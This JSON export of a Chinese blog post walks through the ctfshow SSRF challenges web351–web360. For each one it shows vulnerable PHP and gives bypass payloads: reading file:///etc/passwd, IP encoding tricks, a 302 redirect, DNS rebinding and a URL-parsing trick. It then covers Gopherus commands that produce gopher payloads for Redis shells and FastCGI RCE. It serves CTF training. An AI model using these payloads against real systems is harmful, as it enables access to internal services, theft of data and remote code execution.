{"id":237,"date":"2021-07-18T14:44:33","date_gmt":"2021-07-18T06:44:33","guid":{"rendered":"http:\/\/101.34.19.194\/?p=237"},"modified":"2021-07-18T14:44:35","modified_gmt":"2021-07-18T06:44:35","slug":"ctfshow-ssrf","status":"publish","type":"post","link":"http:\/\/101.34.19.194\/?p=237","title":{"rendered":"ctfshow\u2014SSRF"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">web351<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$ch=curl_init($url);<br>curl_setopt($ch, CURLOPT_HEADER, 0);<br>curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br>$result=curl_exec($ch);<br>curl_close($ch);<br>echo ($result);<br>?&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u65b9\u6cd5\u4e00<\/h3>\n\n\n\n<p>\u5ba1\u8ba1\uff0c\u7528post\u4f20\u53c2\u7ed9url<\/p>\n\n\n\n<p>\u53d1\u73b0\u53ef\u4ee5\u7528<code>file:\/\/<\/code>\u8fdb\u884c\u8bfb\u53d6\u6587\u4ef6<\/p>\n\n\n\n<p><code>url=file:\/\/\/etc\/passwd<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210717194117.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210717194117.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20210717194117071\"\/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u5c1d\u8bd5\u8bfb\u53d6\u7f51\u7ad9\u6839\u76ee\u5f55\u4e0b\u662f\u5426\u5b58\u5728flag<\/p>\n\n\n\n<p><code>url=file:\/\/\/var\/www\/html\/flag.php<\/code><\/p>\n\n\n\n<p>\u67e5\u770b\u6ce8\u91ca\u5f97\u5230flag<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u65b9\u6cd5\u4e8c<\/h3>\n\n\n\n<p>\u76f4\u63a5\u8bbf\u95ee<code>\/flag.php<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210717194242.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210717194242.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20210717194242243\"\/><\/div><\/figure>\n\n\n\n<p>\u63d0\u793a\u975e\u672c\u5730\u7528\u6237\uff0c\u7ed3\u5408\u4ee3\u7801\uff0c\u7528post\u4f20\u53c2<\/p>\n\n\n\n<p><code>url=http:\/\/127.0.0.1\/flag.php<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web352<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$x=parse_url($url);<br>if($x&#91;'scheme']==='http'||$x&#91;'scheme']==='https'){<br>if(!preg_match('\/localhost|127.0.0\/')){<br>$ch=curl_init($url);<br>curl_setopt($ch, CURLOPT_HEADER, 0);<br>curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br>$result=curl_exec($ch);<br>curl_close($ch);<br>echo ($result);<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>?&gt;<\/code><\/pre>\n\n\n\n<p>\u5c4f\u853d\u4e86<code>localhost|127.0.0<\/code>\uff0c\u7528\u8fdb\u5236\u8f6c\u6362\u7ed5\u8fc7<\/p>\n\n\n\n<p><a href=\"https:\/\/tool.520101.com\/wangluo\/jinzhizhuanhuan\/\">IP\u5730\u5740\u8fdb\u5236\u8f6c\u6362 (520101.com)<\/a><\/p>\n\n\n\n<p><code>url=http:\/\/2130706433\/flag.php<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web353<\/h2>\n\n\n\n<p>\u8ddfweb352\u4e00\u6837\u8f6c\u6362\u505a\u6cd5<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web354<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$x=parse_url($url);<br>if($x&#91;'scheme']==='http'||$x&#91;'scheme']==='https'){<br>if(!preg_match('\/localhost|1|0|\u3002\/i', $url)){<br>$ch=curl_init($url);<br>curl_setopt($ch, CURLOPT_HEADER, 0);<br>curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br>$result=curl_exec($ch);<br>curl_close($ch);<br>echo ($result);<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>?&gt;<\/code><\/pre>\n\n\n\n<p>\u628a1\u548c0\u7b49\u90fd\u8fc7\u6ee4\u4e86\uff0c\u53ea\u80fdASCII\u7801\u8f6c\u6362\u6216\u57df\u540d\u7ed1\u5b9a<\/p>\n\n\n\n<p>\u6709\u73b0\u6210\u7684\u57df\u540d\u8df3\u8f6c127.0.0.1<\/p>\n\n\n\n<p>payload\uff1a<code>url=http:\/\/sudo.cc\/flag.php<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web355<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$x=parse_url($url);<br>if($x&#91;'scheme']==='http'||$x&#91;'scheme']==='https'){<br>$host=$x&#91;'host'];<br>if((strlen($host)&lt;=5)){<br>$ch=curl_init($url);<br>curl_setopt($ch, CURLOPT_HEADER, 0);<br>curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br>$result=curl_exec($ch);<br>curl_close($ch);<br>echo ($result);<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>?&gt;<\/code><\/pre>\n\n\n\n<p>\u8981\u6c42\u957f\u5ea6\u5c0f\u4e8e5\uff0c127.0.0.1\u548c127.1\u662f\u7b49\u4ef7\u7684<\/p>\n\n\n\n<p>payload\uff1a<code>url=http:\/\/127.1\/flag.php<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web356<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$x=parse_url($url);<br>if($x&#91;'scheme']==='http'||$x&#91;'scheme']==='https'){<br>$host=$x&#91;'host'];<br>if((strlen($host)&lt;=3)){<br>$ch=curl_init($url);<br>curl_setopt($ch, CURLOPT_HEADER, 0);<br>curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br>$result=curl_exec($ch);<br>curl_close($ch);<br>echo ($result);<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>?&gt;<\/code><\/pre>\n\n\n\n<p>\u957f\u5ea6\u5c0f\u4e8e3\uff0cpayload\uff1a<code>url=http:\/\/0\/flag.php<\/code><\/p>\n\n\n\n<p><strong>0\u5728linux\u7cfb\u7edf\u4e2d\u4f1a\u89e3\u6790\u6210127.0.0.1\u5728windows\u4e2d\u89e3\u6790\u62100.0.0.0<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web357<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$x=parse_url($url);<br>if($x&#91;'scheme']==='http'||$x&#91;'scheme']==='https'){<br>$ip = gethostbyname($x&#91;'host']);<br>echo '&lt;\/br&gt;'.$ip.'&lt;\/br&gt;';<br>if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {<br> &nbsp; &nbsp;die('ip!');<br>}<br>\u200b<br>\u200b<br>echo file_get_contents($_POST&#91;'url']);<br>}<br>else{<br> &nbsp; &nbsp;die('scheme');<br>}<br>?&gt;<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>FILTER_FLAG_IPV4 &#8211; \u8981\u6c42\u503c\u662f\u5408\u6cd5\u7684 IPv4 IP\uff08\u6bd4\u5982 255.255.255.255\uff09 FILTER_FLAG_IPV6 &#8211; \u8981\u6c42\u503c\u662f\u5408\u6cd5\u7684 IPv6 IP\uff08\u6bd4\u5982 2001:0db8:85a3:08d3:1319:8a2e:0370:7334\uff09 FILTER_FLAG_NO_PRIV_RANGE &#8211; \u8981\u6c42\u503c\u662f RFC \u6307\u5b9a\u7684\u79c1\u57df IP \uff08\u6bd4\u5982 192.168.0.1\uff09 FILTER_FLAG_NO_RES_RANGE &#8211; \u8981\u6c42\u503c\u4e0d\u5728\u4fdd\u7559\u7684 IP \u8303\u56f4\u5185\u3002\u8be5\u6807\u5fd7\u63a5\u53d7 IPV4 \u548c IPV6 \u503c\u3002<\/p><\/blockquote>\n\n\n\n<p>\u6240\u4ee5\u4e0d\u80fd\u662f\u79c1\u6709\u5730\u5740<\/p>\n\n\n\n<p>\u5229\u7528302\u8df3\u8f6c\u548cdns\u91cd\u7ed1\u5b9a\u90fd\u53ef\u4ee5<\/p>\n\n\n\n<p>\u4e00\u3001<\/p>\n\n\n\n<p>\u5728\u81ea\u5df1\u670d\u52a1\u5668\u5199\u4e2aa.php\uff0c\u5185\u5bb9\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>header(\"Location:http:\/\/127.0.0.1\/flag.php\"); <\/code><\/pre>\n\n\n\n<p>payload\uff1a<code>http:\/\/xxx\/a.php<\/code><\/p>\n\n\n\n<p>\u4e8c\u3001<\/p>\n\n\n\n<p>\u5728\u8fd9\u4e2a\u7f51\u7ad9\u6ce8\u518c\u4e00\u4e2a\u8d26\u53f7<code>http:\/\/ceye.io\/<\/code>\uff0c\u7136\u540e\u4f1a\u7ed9\u4f60\u5206\u914d\u4e00\u4e2a\u57df\u540d\uff0c\u4fee\u6539\u6210\u5982\u4e0b\u7684\u5185\u5bb9\uff0c\u7b2c\u4e00\u4e2a\u968f\u4fbf\u5929\u586b\uff0c\u7b2c\u4e8c\u4e2a\u5199 <img decoding=\"async\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" src=\"https:\/\/img-blog.csdnimg.cn\/2020123016283436.png\"><\/p>\n\n\n\n<p>\u7136\u540epayload:<code>http:\/\/r.xxxxxx\/flag.php<\/code> xxx\u4e3a\u5206\u7ed9\u4f60\u7684\u57df\u540d\uff0c\u5982<\/p>\n\n\n\n<p><code>url=http:\/\/r.cvwxxx.ceye.io\/flag.php<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/img-blog.csdnimg.cn\/20201230163344555.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/img-blog.csdnimg.cn\/20201230163344555.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"\/><\/div><\/figure>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>DNS\u91cd\u7ed1\u5b9a\u53ef\u4ee5\u770b\u770b\u5408\u5929\u7f51\u5b89\u7684\u6587\u7ae0<\/p><p><a href=\"https:\/\/zhuanlan.zhihu.com\/p\/89426041\">\u6d45\u8c08DNS\u91cd\u7ed1\u5b9a\u6f0f\u6d1e &#8211; \u77e5\u4e4e (zhihu.com)<\/a><\/p><\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">web358<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$x=parse_url($url);<br>if(preg_match('\/^http:\\\/\\\/ctf\\..*show$\/i',$url)){<br> &nbsp; &nbsp;echo file_get_contents($url);<br>}<\/code><\/pre>\n\n\n\n<p>\u6b63\u5219\u8868\u8fbe\u5f0f\u7684\u610f\u601d\u662f\u4ee5<code>http:\/\/ctf.<\/code>\u5f00\u5934\uff0c\u4ee5<code>show<\/code>\u7ed3\u5c3e\u3002 payload:<code>http:\/\/ctf.@127.0.0.1\/flag.php?show<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/img-blog.csdnimg.cn\/20201230164344219.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/img-blog.csdnimg.cn\/20201230164344219.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"\/><\/div><\/figure>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>pares_url\u51fd\u6570\u4e2d\uff0c\u628a@\u540e\u5f53\u6210\u4e3b\u673a\u5730\u5740\u89e3\u6790<\/p><\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">web359<\/h2>\n\n\n\n<p>\u5de5\u5177\u4e0b\u8f7d\u5730\u5740<code>https:\/\/github.com\/tarunkant\/Gopherus<\/code><\/p>\n\n\n\n<p>\u5de5\u5177\u4f8b\u5b50<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Examples<\/h2>\n\n\n\n<ul><li>MySQL\uff1a\u5982\u679c\u7528\u6237\u6ca1\u6709\u5bc6\u7801\u4fdd\u62a4\uff0c\u4f60\u53ef\u4ee5\u8f6c\u50a8\u4ed6\u7684\u6570\u636e\u5e93\uff0c\u4e5f\u53ef\u4ee5\u628a\u6076\u610f\u6587\u4ef6\u653e\u5230\u4ed6\u7684\u7cfb\u7edf\u4e2d\u3002<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit mysql<\/pre>\n\n\n\n<p>\u5b83\u53ea\u8be2\u95eeMySQL\u7528\u6237\u7684\u7528\u6237\u540d\uff0c\u5b83\u5c06\u4e3a\u60a8\u63d0\u4f9bgopher\u94fe\u63a5\u3002<\/p>\n\n\n\n<ul><li>PostgreSQL\uff1a\u5982\u679c\u7528\u6237\u6ca1\u6709\u5bc6\u7801\u4fdd\u62a4\uff0c\u4f60\u53ef\u4ee5\u8f6c\u50a8\u4ed6\u7684\u6570\u636e\u5e93\uff0c\u4e5f\u53ef\u4ee5\u5728\u4ed6\u7684\u7cfb\u7edf\u4e2d\u653e\u5165\u6076\u610f\u6587\u4ef6\u3002<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit postgresql<\/pre>\n\n\n\n<p>\u5b83\u53ea\u8be2\u95eePostgres\u7528\u6237\u7684\u7528\u6237\u540d\u548c\u6570\u636e\u5e93\u540d\u79f0\uff0c\u7136\u540e\u5b83\u5c06\u4e3a\u60a8\u63d0\u4f9bgopher\u94fe\u63a5\u3002<\/p>\n\n\n\n<ul><li>FastCGI\uff1a\u5982\u679c\u7aef\u53e39000\u662f\u5f00\u653e\u7684\uff0c\u6ca1\u6709\u5b89\u5168\u6027\uff0c\u90a3\u4e48\u4f60\u53ef\u4ee5\u5f97\u5230RCE\u3002<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit fastcgi<\/pre>\n\n\n\n<p>\u5b83\u53ea\u8981\u6c42\u4e00\u4e2a\u5fc5\u987b\u5b58\u5728\u4e8e\u53d7\u5bb3\u8005\u7cfb\u7edf\u4e2d\u7684\u6587\u4ef6\uff08preferred.php\u6587\u4ef6\uff09\uff0c\u4f46\u662f\u6211\u4eec\u6709\u4e00\u4e2a\u9ed8\u8ba4\u6587\u4ef6\u3002<\/p>\n\n\n\n<ul><li>Redis\uff1a\u5982\u679cRedis\u7aef\u53e3\u662f\u6253\u5f00\u7684\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u8986\u76d6\u7cfb\u7edf\u4e2d\u7684\u6587\u4ef6\uff0c\u8fd9\u592a\u5371\u9669\u4e86\u3002\u6240\u4ee5\u8fd9\u91cc\u6709\u4e24\u4e2a\u4e1c\u897f\u53ef\u4ee5\u5f97\u5230\uff1aa.Reverse Shell b.PHP Shell<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit redis<\/pre>\n\n\n\n<ul><li>Zabbix\uff1a\u5982\u679c\u7aef\u53e310050\u662f\u6253\u5f00\u7684<code>EnableRemoteCommands = 1<\/code>\uff0c\u90a3\u4e48\u60a8\u53ef\u4ee5\u5728\u53d7\u5bb3\u8005\u7cfb\u7edf\u4e0a\u8fd0\u884cshell\u547d\u4ee4\u3002<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit zabbix<\/pre>\n\n\n\n<ul><li>Memcached\uff1a\u5b83\u4e3b\u8981\u7528\u4e8e\u5b58\u50a8\u5e8f\u5217\u5316\u6570\u636e\uff0c\u4f46\u5f53\u6d89\u53ca\u5230De-serialize\u8fd9\u4e9b\u6570\u636e\u65f6\uff0c\u5df2\u77e5\u7684\u6f0f\u6d1e\uff0c\u5982PHPDe-serialization\u95ee\u9898\uff0cPython-PickleDe-serialization\u95ee\u9898\uff0cRuby-MarshalDe-serialization\u95ee\u9898\u51fa\u73b0\uff0c\u4ece\u800c\u5bfc\u81f4RCE\u3002\u56e0\u6b64\uff0c\u6211\u4e3a\u6bcf\u4e2a\u811a\u672c\u521b\u5efa\u4e86\u4e0d\u540c\u7684\u811a\u672c\uff0c\u8fd8\u521b\u5efa\u4e86\u4e00\u4e2a\u7528\u4e8e\u8f6c\u50a8Memcached\u5185\u5bb9\u7684\u811a\u672c\uff1a<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit pymemcache<br>gopherus --exploit rbmemcache<br>gopherus --exploit phpmemcache<br>gopherus --exploit dmpmemcache<\/pre>\n\n\n\n<ul><li>SMTP\uff1a\u5982\u679c\u7aef\u53e325\u662f\u5f00\u653e\u7684\u5e76\u4e14\u6211\u4eec\u53ef\u4ee5\u8bbf\u95ee\u5b83\uff0c\u6211\u4eec\u53ef\u4ee5\u5c06\u6d88\u606f\u53d1\u9001\u7ed9\u4f5c\u4e3a\u53d7\u5bb3\u8005\u7528\u6237\u7684\u4efb\u4f55\u4eba\uff0c\u6240\u4ee5\u8fd9\u4e2a\u5de5\u5177\u5c06\u751f\u6210gopher\u6709\u6548\u8d1f\u8f7d\u6765\u53d1\u9001\u90ae\u4ef6\u3002<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit smtp<\/pre>\n\n\n\n<p>python gopherus.py &#8211;exploit mysql <img decoding=\"async\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" src=\"https:\/\/img-blog.csdnimg.cn\/20201230164517383.png\"> \u7136\u540e\u4f20\u5230check.php\u4e2dpost: returl=xxxxx,\u4f46\u662f\u4e0d\u8981\u5fd8\u4e86\u628a\u4e0b\u5212\u7ebf\u540e\u9762\u7684\u5185\u5bb9url\u7f16\u7801\u4e00\u6b21\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web360<\/h2>\n\n\n\n<p>python gopherus.py &#8211;exploit redis <img decoding=\"async\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" src=\"https:\/\/img-blog.csdnimg.cn\/20201230164820392.png\"> \u64cd\u4f5c\u65b9\u6cd5\u548c\u4e0a\u9762\u4e00\u6837\u4e0d\u8981\u5fd8\u8bb0\u7f16\u7801\u3002\u5de5\u5177\u9ed8\u8ba4\u662f\u751f\u6210shell.php<\/p>\n","protected":false},"excerpt":{"rendered":"<p>web351 \u65b9\u6cd5\u4e00 \u5ba1\u8ba1\uff0c\u7528post\u4f20\u53c2\u7ed9url \u53d1\u73b0\u53ef\u4ee5\u7528file:\/\/\u8fdb\u884c\u8bfb\u53d6\u6587\u4ef6 url=file:\/ [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[19],"_links":{"self":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/237"}],"collection":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=237"}],"version-history":[{"count":1,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/237\/revisions"}],"predecessor-version":[{"id":238,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/237\/revisions\/238"}],"wp:attachment":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=237"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=237"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=237"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}